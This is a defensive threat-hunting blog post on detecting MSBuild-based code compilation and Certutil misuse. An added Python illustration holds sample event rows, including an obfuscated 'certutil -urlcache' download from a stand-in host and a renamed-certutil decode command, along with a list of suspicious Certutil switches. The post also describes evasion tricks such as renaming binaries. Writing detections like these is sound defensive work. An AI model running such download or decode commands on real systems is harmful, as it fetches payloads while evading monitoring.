FalconFriday — Detecting suspicious code compilation and Certutil — 0xFF02

Olaf Hartong
Sep 11, 2020 · 4 min read

We believe there isn’t enough content available to detect advanced adversary techniques. That’s why every two weeks on “FalconFriday”, we will release hunting queries to detect offensive techniques. Today: part three!

Today’s content:

  • Detecting suspicious code compilation (‘Bring-your-own-code’).
  • Detecting the malicious use of Certutil.

We love to hear back from you on the results. Any feedback or suggestions for improvements are welcome. Feel free to create pull requests if you have improvements which can benefit the community.

‘Bring-your-own-code’

This query is aimed at detecting process executions, specifically those associated with compilation software.

Several tools exist for this purpose. An example is MSBuildShell, a tool created by Cn33liz. It provides a PowerShell-like shell from within MSBuild.exe, allowing you to do everything as if it were a normal PowerShell session, while bypassing controls like application whitelisting and process restrictions.

Using these techniques to remain undetected is not new; in fact, it has been around for a very long time. Still, it remains a very effective technique, largely because this behaviour is not detected by the default use cases in a lot of security solutions. Luckily for you, this FalconFriday brings you some ideas on how you can catch this behaviour!

A few considerations:

  • To reduce false positives, we recommend excluding items based on specific FolderPaths.
  • Depending on your environment, there obviously may be some legitimate use that we didn’t account for.

You can find the query here on GitHub; we tagged it as T1127-WIN-001.md.

Like to read more about this?

Certificate services: Certutil

  • LOLBins: using Windows binaries.
  • LOLLibs: using libraries.
  • LOLScripts: using scripts.

There’s also a repo available called ‘Living Off The Land Binaries and Scripts’ (LOLBAS), centralising over 100 binaries to use. This repo is maintained by several individuals. The most popular LOLbin according to stats by Oddvar Moe, and one of the more versatile ones, is Certutil.

This query is aimed at detecting malicious use of Certutil.

According to Microsoft ‘Certutil.exe is a command-line program, installed as part of Certificate Services. You can use certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains’.

This LOLBin can be used to execute the following techniques:

  • T1105 — Ingress Tool Transfer
  • T1564.004 — Hide Artifacts: NTFS File Attributes
  • T1027 — Obfuscated Files or Information
  • T1140 — Deobfuscate/Decode Files or Information

Now, how can we detect malicious behaviour, given that most of the time Certutil activity is legitimate?

  • Our detection focuses on ‘detection evasion’ techniques. Most of these have been pulled from the amazing research by Daniel Bohannon, aptly named DOSfuscation.
  • Second, you want to define the HashTimeFrame. We recommend working with a 30d timeframe due to potential resource constraints.
  • Next, we want to start looking into Certutil executions by investigating SHA1 hashes from prior Certutil executions, or from file create events where the former file name is Certutil.

A few considerations:

  • Bear in mind that bypasses are always possible. For example, we added detection resiliency logic to address the scenario where the attacker renames the binary before executing it. If an already-renamed binary were uploaded instead, our rule might miss it.
  • For the download technique, you could match it to DeviceNetworkEvents that connect to the internet for more contextual information.
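As an added illustration (not the FalconForce query itself, which is KQL and lives on GitHub), the same hunting logic in Python over a few constructed event rows: SHA1-based resiliency against renamed binaries, normalisation of DOSfuscation-style command lines, and a check for the Certutil switches behind the listed techniques. Field names are assumed to follow the Defender for Endpoint advanced-hunting schema; hashes and rows are constructed placeholders.

```python
import re
from collections import namedtuple

# Constructed rows modelled on the advanced-hunting schema (assumed field names:
# DeviceProcessEvents.FileName/SHA1/ProcessCommandLine, DeviceFileEvents.PreviousFileName/FileName/SHA1).
ProcessEvent = namedtuple("ProcessEvent", "FileName SHA1 ProcessCommandLine")
FileEvent = namedtuple("FileEvent", "PreviousFileName FileName SHA1")

CERTUTIL_HASH = "SHA1-PLACEHOLDER-CERTUTIL"  # constructed placeholder, not the real binary's hash
OTHER_HASH = "SHA1-PLACEHOLDER-OTHER"

PROCESS_EVENTS = [
    ProcessEvent("certutil.exe", CERTUTIL_HASH, "certutil.exe -verify cert.cer"),
    ProcessEvent("certutil.exe", CERTUTIL_HASH, 'c^ertutil -urlc^ache -split -f "http://example.invalid/t" t.txt'),
    ProcessEvent("svc.exe", CERTUTIL_HASH, "svc.exe -decode in.txt out.exe"),  # renamed copy
    ProcessEvent("notepad.exe", OTHER_HASH, "notepad.exe notes.txt"),
]
FILE_EVENTS = [FileEvent("certutil.exe", "svc.exe", CERTUTIL_HASH)]  # rename seen on disk

# Switches tied to the techniques the post lists: -urlcache (T1105), -encode/-decode (T1027/T1140).
SUSPICIOUS_SWITCHES = ("urlcache", "decode", "encode")


def known_certutil_hashes(process_events, file_events):
    """Resiliency step: every SHA1 seen as certutil.exe, either executed or renamed on disk."""
    hashes = {e.SHA1 for e in process_events if e.FileName.lower() == "certutil.exe"}
    hashes |= {e.SHA1 for e in file_events if (e.PreviousFileName or "").lower() == "certutil.exe"}
    return hashes


def normalize_cmdline(cmd):
    """Strip DOSfuscation-style layering: caret escapes, stray double quotes, padding whitespace."""
    return re.sub(r"\s+", " ", cmd.replace("^", "").replace('"', "")).strip().lower()


def hunt_certutil(process_events, file_events):
    """Return (command line, reasons) for executions that look like Certutil misuse."""
    certutil_hashes = known_certutil_hashes(process_events, file_events)
    findings = []
    for e in process_events:
        if e.FileName.lower() != "certutil.exe" and e.SHA1 not in certutil_hashes:
            continue  # not Certutil by name or by hash
        norm = normalize_cmdline(e.ProcessCommandLine)
        reasons = []
        if e.FileName.lower() != "certutil.exe":
            reasons.append("renamed certutil (matched by SHA1)")
        if norm != re.sub(r"\s+", " ", e.ProcessCommandLine).strip().lower():
            reasons.append("command-line obfuscation characters")
        reasons += [f"switch -{s}" for s in SUSPICIOUS_SWITCHES if f"-{s}" in norm]
        if reasons:
            findings.append((e.ProcessCommandLine, reasons))
    return findings
```

In production the hash set would be built from the HashTimeFrame window described above rather than from the same batch of events, and the DeviceNetworkEvents join for the download case would be layered on top.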

Usage in production

You can find the query here on GitHub; we tagged it as T1105-WIN-001.md.

Like to read more about this?

Disclaimers

  • The queries will be free to use in any way you like, although we appreciate a reference back to @falconforceteam Twitter / FalconForce GitHub.
  • Direct link to our GitHub page: https://github.com/FalconForceTeam/FalconFriday

The FalconForce Medium page with the bi-weekly articles can be found HERE.
